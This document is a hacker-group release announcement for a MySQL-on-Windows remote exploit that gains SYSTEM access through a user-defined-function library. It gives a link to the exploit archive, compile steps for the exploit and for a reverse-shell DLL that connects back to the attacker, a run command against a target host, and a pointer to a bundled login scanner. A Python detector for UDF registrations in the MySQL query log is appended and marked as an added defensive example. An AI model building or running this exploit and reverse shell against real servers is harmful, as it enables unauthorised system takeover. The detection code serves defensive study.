***
FARLiGHT ELiTE HACKERS LEGACY R3L3ASE
***

Attached is the MySQL Windows Remote Exploit (post-auth, udf
technique) including the previously released mass scanner.
The exploit is mirrored at the farlight website http://www.farlight.org.

Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday
All owned By Kingcope

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23073.tar.gz

Installation Instructions
=============================

1. Install mysql client libraries and headers (UNIX)

   RedHat based (e.g. CentOS):

       yum install mysql mysql-devel

2. Compile the standalone exploit

   issue commands:

       gcc mysqljackpot.c -o mysqljackpot -L/usr/lib/mysql -lmysqlclient

3. Compile the reverse shell payload (this is required!)

   required because the connect back ip and port are hardcoded in the dll:
   use mingw on windows or wine
   change REVERSEIP and REVERSEPORT to suit your needs. If you change REVERSEPORT you have
   to change the port in mysqljackpot.c too (default port: 443).

   issue commands:

       set PATH=%PATH%;c:\MinGW\bin\
       gcc -c payload.c
       gcc -shared -o payload.dll payload.o -lws2_32

   copy the payload.dll into the mysqljackpot exploit folder

4. Run The Exploit

       ./mysqljackpot -u root -p "" -t 99.99.99.99

   A valid database admin user and his password are required
   for the exploit to work properly.
   This exploit is especially useful when used in connection
   to a MySQL login scanner, see scanner/README.mysql inside this package.
   Be sure to have the firewall open on the desired reverse port
   on the attacking machine.

5. Enjoy your SYSTEM Shell!!!

Yours Sincerely,

-- Kingcope
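
Detection side of the udf technique named above, as an added example that is not part of the original release: MySQL loads a user-defined function library with a CREATE FUNCTION ... SONAME statement, so a server with the general query log enabled records which account and client host registered which library. The log sample, the function and library names, and the approved_libraries allowlist are constructed for illustration; multi-line statements are not handled.

```python
import re

# Constructed sample in the MySQL 5.x general query log layout
# (optional timestamp, connection id, command, argument). Not from a real host.
SAMPLE_LOG = (
    "121202 10:15:31\t    7 Connect\tapp@10.0.0.5 on shop\n"
    "\t\t    7 Query\tSELECT id FROM orders WHERE id = 4\n"
    "121202 10:15:40\t    9 Connect\troot@203.0.113.7 on mysql\n"
    "\t\t    9 Query\tCREATE FUNCTION example_udf RETURNS STRING SONAME 'example_lib.dll'\n"
    "\t\t    7 Query\tcreate function geo_dist returns real soname 'approved_geo.dll'\n"
    "\t\t    9 Quit\t\n"
)

LINE = re.compile(r"^(?:\d{6}\s+\d{1,2}:\d{2}:\d{2})?\s*(\d+)\s+(\w+)\t?(.*)$")
CONNECT = re.compile(r"^(\S+)@(\S+)\s+on\b")
UDF = re.compile(
    r"CREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+`?(\w+)`?\s+RETURNS\s+\w+\s+"
    r"SONAME\s+['\"]([^'\"]+)['\"]",
    re.IGNORECASE,
)

def find_udf_registrations(log_text, approved_libraries=frozenset()):
    """Return one finding per UDF registration, tied to the session that ran it."""
    approved = {name.lower() for name in approved_libraries}
    sessions = {}   # connection id -> (user, client host), from Connect lines
    findings = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        conn_id, command, arg = m.groups()
        if command == "Connect":
            who = CONNECT.match(arg)
            if who:
                sessions[conn_id] = who.groups()
        elif command == "Quit":
            sessions.pop(conn_id, None)
        elif command == "Query":
            udf = UDF.search(arg)
            if udf:
                user, host = sessions.get(conn_id, ("?", "?"))
                library = udf.group(2)
                findings.append({
                    "user": user, "host": host,
                    "function": udf.group(1), "library": library,
                    # Windows file names are case-insensitive, so compare lowered.
                    "approved": library.lower() in approved,
                })
    return findings
```

Findings with "approved" set to False are the ones to triage first, alongside a review of the rows in mysql.func on the server itself.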